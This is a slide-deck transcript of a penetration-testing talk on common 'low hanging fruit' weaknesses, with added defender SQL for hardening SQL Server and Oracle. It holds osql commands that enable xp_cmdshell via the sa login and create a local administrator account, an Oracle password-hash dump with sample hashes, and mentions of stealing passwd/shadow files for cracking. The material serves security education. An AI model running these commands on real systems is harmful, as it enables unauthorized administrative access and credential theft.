The Low Hanging Fruit of Penetration Testing Presented by: Bryan Miller
AGENDA
• Pen Testing vs. VA vs. Risk Assessments
• Penetration Testing Concepts/Issues
• What is Low Hanging Fruit
• Low Hanging Fruit Examples
• Wrap Up

• B.S. I.S., M.S. C.S. – Virginia Commonwealth University
• Current CISSP, former Banyan CBE & Cisco CCIE
• Former adjunct professor – I.S. & C.S. – VCU
• ISSA, ISACA, IALR and VA SCAN lecturer
• Penetration testing for 11+ years
• Published author with 25 years in I.T.
Penetration Testing vs. Vulnerability Assessments vs. Risk Assessments

• Penetration Testing
  • Tests for actual vulnerabilities and what can be exploited
  • Value add comes from putting the pieces together
• Vulnerability Assessment
  • Reports on potential vulnerabilities without testing them
  • Assigns risk values to each issue
• Risk Assessment
  • More analytical and less technical
  • Great for overviews but IMHO it will never catch LHF
Penetration Testing Concepts/Issues

Types of testing
• External
  • Testing from outside the security perimeter (firewall)
  • Internet, dial-in, wireless, physical & social engineering
  • Usually performed in a black-box approach w/no credentials

Types of testing
• Internal
  • What is accessible inside the security perimeter
  • White-box or black-box depending on goals
  • Tests for effects of automated malicious software

Issues - Requirements definition
• Do you need a penetration test, VA or risk assessment?
  • Sometimes you may need more than one
• What is the ultimate goal of the test?
  • Physical → Test security cameras, locks and alarms
  • Social Engineering → Test HR policies and procedures
  • Vulnerability Assessment → Patch scan
• How do you define success?
  • How do you know if the test succeeded or failed?
  • Sometimes difficult to define for a penetration test

Issues - In-house or outsourced?
• In-house
  • Keeping qualified staff happy is a tough job
  • Tools and training can be very expensive
  • Sometimes you just need an unbiased 2nd opinion
• Outsourced
  • How do you judge competency?
  • Do they have a methodology, tool list, references?
  • Do they outsource their work?
  • Geography/vertical market coverage

Issues
• Deliverables
  • Will the report include specific recommendations?
  • Is there tool output for verification?
  • No boilerplate text!
• Remediation
  • If you don’t plan on fixing the issues, don’t waste the time or money performing the tests
• Post-remediation testing
  • Critical to ensure that all issues have been resolved
What is Low Hanging Fruit?

The Low Hanging Fruit Top Ten
• Permissions on data resources
• Employee security awareness
• Encryption
• Policies & procedures
• Physical security

The Low Hanging Fruit Top Ten
• Password management
• Default security controls
• OS and application patches
• SQL Injection, XSS, URL issues
• Wireless access points/modems

Low Hanging Fruit Examples
Fun with Microsoft SQL
• Turn on “xp_cmdshell” if it’s disabled
  • osql -S10.1.1.1 -U sa -P pwd -Q"EXECUTE master.dbo.sp_configure 'show advanced options', 1"
  • osql -S10.1.1.1 -U sa -P pwd -Q"RECONFIGURE"
  • osql -S10.1.1.1 -U sa -P pwd -Q"EXECUTE master.dbo.sp_configure 'xp_cmdshell', 1"
  • osql -S10.1.1.1 -U sa -P pwd -Q"RECONFIGURE"

More Fun with Microsoft SQL
• Add administrative user
  • osql -S10.1.1.1 -U sa -P pwd -Q"EXECUTE xp_cmdshell 'net user bmiller passwd /add'"
  • osql -S10.1.1.1 -U sa -P pwd -Q"EXECUTE xp_cmdshell 'net localgroup administrators bmiller /add'"
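The defender's counterpart to the two slides above, added here and not part of the original deck: T-SQL that reports whether xp_cmdshell is enabled, returns it to its disabled default, and checks the state of the sa login the sequence depends on. It assumes a sysadmin connection to the instance; the 10.1.1.1 host and sa password on the slides are the tester's and are not used here.

```sql
-- Added example (not from the slides): audit and harden the settings the
-- osql sequence above flips. Run with a sysadmin login on the SQL Server instance.

-- 1. Current state of the relevant options (0 = disabled, 1 = enabled).
--    value_in_use is what the engine is actually running with right now.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Return xp_cmdshell to its disabled default. 'show advanced options' has to
--    be on before xp_cmdshell can be changed, so enable it, disable xp_cmdshell,
--    then hide the advanced options again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 3. The attack path also needs the sa login with a guessable password.
--    sa keeps SID 0x01 even if it has been renamed; confirm it is disabled and
--    see when its password was last changed.
SELECT name, is_disabled,
       LOGINPROPERTY(name, 'PasswordLastSetTime') AS password_last_set
FROM sys.server_principals
WHERE sid = 0x01;

-- 4. Re-check: xp_cmdshell should now report value_in_use = 0.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';
```

A scheduled run of steps 1 and 4 alone gives a cheap drift check; any row where xp_cmdshell shows 1 is worth an alert, since nothing in normal operation should turn it on.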
The Trouble with VNC

There are many ways to get the VNC password hashes…

Fun with Oracle
• Dumping password hashes – non-privileged account
• Logged in as “dbsnmp”, we ran the following query:
  select username, password from dba_users;
  DBSNMP  AE1E40C725DFCAC8
  AQADMIN 739EF27E22AC39DC
  SYS     C10A280B9CFF9A72
  SYSTEM  04D19DEFD642AF20

Ran CheckPWD:
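An added defender's check for the Oracle finding above (not from the slides): the weak points are a monitoring account left on its shipped password and a low-privilege login that can read DBA_USERS. It assumes a DBA connection to Oracle 11g or later, where the DBA_USERS_WITH_DEFPWD view exists.

```sql
-- Added example (not from the slides): find and close the door the dbsnmp
-- finding above walks through. Run as a DBA on Oracle 11g or later.

-- 1. Accounts still using the password Oracle shipped them with. DBSNMP is the
--    classic case; every OPEN row here is a login that can be guessed in one try.
SELECT d.username, u.account_status
FROM   dba_users_with_defpwd d
JOIN   dba_users u ON u.username = d.username
ORDER  BY d.username;

-- 2. Who can read DBA_USERS (which on 10g and earlier exposes the hash in its
--    PASSWORD column)? Direct grants plus anyone holding SELECT_CATALOG_ROLE,
--    which grants read access to every DBA_ view.
SELECT grantee, privilege
FROM   dba_tab_privs
WHERE  table_name = 'DBA_USERS'
UNION ALL
SELECT grantee, 'via SELECT_CATALOG_ROLE'
FROM   dba_role_privs
WHERE  granted_role = 'SELECT_CATALOG_ROLE';

-- 3. Lock and expire the monitoring account if nothing uses it, or give it a
--    real password if Enterprise Manager still needs it.
ALTER USER dbsnmp ACCOUNT LOCK PASSWORD EXPIRE;
-- ALTER USER dbsnmp IDENTIFIED BY "<new strong password>";  -- placeholder, if still needed

-- 4. Confirm the change took.
SELECT username, account_status, lock_date, expiry_date
FROM   dba_users
WHERE  username = 'DBSNMP';
```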
Reboot via Compaq Insight Manager (CIM)

Appliances are not immune….

Downloaded passwd, shadow, host files

Looks like we can request any file?

OK, we’ll ask for the password file. Next up, JTR!

This is why PCI doesn’t allow WEP

What the fake telephone repairman saw…

The danger of scripts lying around…

Wrap-Up